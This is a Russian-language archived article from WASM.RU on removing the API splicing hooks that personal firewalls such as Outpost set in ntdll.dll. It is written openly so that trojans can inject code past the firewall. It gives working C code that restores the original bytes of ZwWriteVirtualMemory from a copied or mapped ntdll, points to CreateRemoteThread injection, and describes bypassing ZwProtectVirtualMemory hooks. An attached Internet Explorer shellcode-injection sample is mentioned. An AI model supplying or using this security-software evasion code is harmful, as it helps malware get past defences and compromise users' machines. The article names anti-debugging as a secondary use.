Простой способ противодействия сплайсингу API — Архив WASM.RU

Для перехвата вызова какой-нибудь API функции обычно используется метод, называемый сплайсингом. Суть метода состоит в замене первых 5 байт функции инструкцией JMP передающей управление коду-перехватчику. Данная техника широко используется в персональных фаерволах для того, чтобы предотвратить внедрение троянскими программами своего кода в адресное пространство других процессов, которым разрешен доступ в сеть. Тем не менее, существуют различные техники, позволяющие троянописателям прорываться сквозь огненные стены. К примеру, популярный фаервол Agnitum Outpost третьей версии можно было легко обойти, запуская браузер и указав в качестве аргумента командной строки скрипт пересылающий награбленные данные, а затем переместив окно за экран или же внедрением кода в запускаемый процесс (подробнее в статье MS-REM'а «Инжект как метод обхода фаерволлов»). Однако разработчики все же пошаманили над своим детищем и Outpost 4.0 уже надежно(?) противостоит этим методикам. Но если защиту нельзя обойти, то почему бы не попробовать ее убрать?!

Первое, что приходит в голову - получить с помощью LoadLibrary/GetProcAddress оригинальный код перехваченной функции, а затем заменить им прежний код в памяти, убрав таким образом переход на функцию-хук. Поскольку вызов LoadLibrary вернет указатель на уже загруженный модуль, необходимо скопировать файл и загрузить копию. Следующий код убивает перехват функции ZwWriteVirtualMemory, чего достаточно для безнаказанной записи в тело чужого процесса.

Код (Text):

1.  
2. // копируем файл NTDLL.DLL в папку TEMP
3.  
4.     char szTemp[MAX_PATH];
5.  
6.     GetTempPath(MAX_PATH, szTemp);
7.  
8.     strcat(szTemp, "ntdll2.dll");
9.  
10.     CopyFile("C:\\Windows\\System32\\ntdll.dll", szTemp, TRUE);
11.    
12.     // получаем указатель на оригинальную функцию
13. HMODULE hMod = LoadLibrary(szTemp);
14.     void* ptr_orig = GetProcAddress(hMod, "ZwWriteVirtualMemory"); 
15.    
16.     // получаем указатель на текущую функцию
17.     void* ptr_new = GetProcAddress (LoadLibrary("ntdll.dll"), "ZwWriteVirtualMemory");
18.    
19.     // устанавливаем полный доступ на память
20.     DWORD dwOldProtect;
21.     VirtualProtect(ptr_new, 10, PAGE_EXECUTE_READWRITE, &dwOldProtect);
22.  
23.     // заменяем первые 10(на всякий случай) байт функции
24.     memcpy(ptr_new, ptr_orig, 10);
25.    
26.     FreeLibrary(hMod);
27.     DeleteFile(szTemp);

После этого, для выполнения своего кода в чужом адресном пространстве можно применять классический метод с использованием CreateRemoteThread. Кстати, Outpost также перехватывает эту функцию, но, тем не менее, без вопросов разрешает создание потока в другом процессе.

Хотя приведенный метод снятия перехвата вполне рабочий, он требует подгрузку нового dll модуля, что может вызвать негодование агрессивно настроенного фаервола. Более элегантным решением мне кажется просто прочитать из файла нужные байты. Код следующей функции восстанавливает оригинальное начало API.

Код (Text):

1.  
2. bool RemoveFWHook(char* szDllPath, char* szFuncName) // в szDllPath полный путь к DLL !
3. {
4.     // получаем указатель на функцию
5.     HMODULE lpBase = LoadLibrary(szDllPath);
6.     LPVOID lpFunc = GetProcAddress(lpBase, szFuncName);
7.     if(!lpFunc)
8.         return false;
9.     // получаем RVA
10.     DWORD dwRVA = (DWORD)lpFunc-(DWORD)lpBase;
11.  
12.     // проецируем файл в память
13.     HANDLE hFile = CreateFile(szDllPath,GENERIC_READ, FILE_SHARE_READ,
14.                         NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);
15.     if(INVALID_HANDLE_VALUE == hFile)
16.         return false;
17.  
18.     DWORD dwSize = GetFileSize(hFile, NULL);
19.  
20.     HANDLE hMapFile = CreateFileMapping(hFile, NULL, PAGE_READONLY|SEC_IMAGE, 0, dwSize, NULL);
21.  
22.     LPVOID lpBaseMap = MapViewOfFile(hMapFile, FILE_MAP_READ, 0, 0, dwSize);
23.    
24. // указатель на настоящую функцию
25.     LPVOID lpRealFunc = (LPVOID)((DWORD)lpBaseMap+dwRVA);
26.  
27.     // изменяем права на доступ и копируем
28.     DWORD dwOldProtect;
29.     BOOL bRes=true;
30.     if(VirtualProtect(lpFunc, 10, PAGE_EXECUTE_READWRITE, &dwOldProtect))
31.     {
32.         memcpy(lpFunc, lpRealFunc, 10);
33.     }else{
34.         bRes=false;
35.     }
36.  
37.     UnmapViewOfFile(lpBaseMap);
38.  
39.     CloseHandle(hMapFile);
40.     CloseHandle(hFile);
41.  
42.     return bRes;

}

Обратите внимание на вызов функции CreateFileMapping, параметр SEC_IMAGE указывает на то, что файл будет спроецирован в памяти как исполняемый, это избавляет нас от разбора PE заголовка и вычисления файлового смещения. Впрочем, приведенный пример имеет свои недостатки - пользователю может быть запрещено чтение системных файлов, кроме того, разработчики могут пропатчить файл на диске (хотя это и маловероятно, ибо грозит девелоперам геморроем). Противодействовать и этому возможно, создав базу сигнатур начал функций. К примеру, во всех исследованных мною Windows XP (SP0-SP2, RU и MUI) функция ZwWriteVirtualMemory начинается с байт

Код (Text):

1.  
2. B8 15 01 00 00

что соответствует мнемонике

Код (Text):

1.  
2. mov  eax, 00000115

Для того чтобы узнать сигнатуру, нет необходимости устанавливать ось на жесткий диск, поскольку файл ntdll.dll лежит в дистрибутиве в открытом виде. Конечно, использование статичных сигнатур не гарантирует совместимость, но это наилучший способ защиты от перехвата.

Применять вышеописанные техники можно и для вполне мирных целей - как приём для защиты от отладки. К примеру, наше приложение читает из реестра лицензионный ключ, и нам бы не хотелось, чтобы за этим наблюдал хакер. Восстановив оригинальный код функций для работы с реестром, мы тем самым убьем программные брекпоинты (опкоды 0xCC). Правда, это не сработает, если хакер поставит бряк на конец функции, а мы восстановим только ее начало. Поэтому, лучше восстановить сразу всю секцию кода.

Анти-анти сплайсинг =)

Для защиты от подобных методов анти-перехвата девелоперы могут наложить заклятие на функцию ZwProtectVirtualMemory. Перехват этой функции позволит контролировать изменение атрибутов доступа к памяти, а следовательно и сделать невозможным запись по интересующим адресам. Впрочем, это не спасет, если создать упоминавшуюся выше базу начал функций. Вооружившись дизассемблером длин инструкций (компактные движки можно легко найти в Интернете) можно вызывать первые инструкции из своей базы, а затем, минуя перехватчик, передавать управление основному коду функции.

В аттаче к статье лежит пример внедрения шеллкода в Internet Explorer. © PSI_H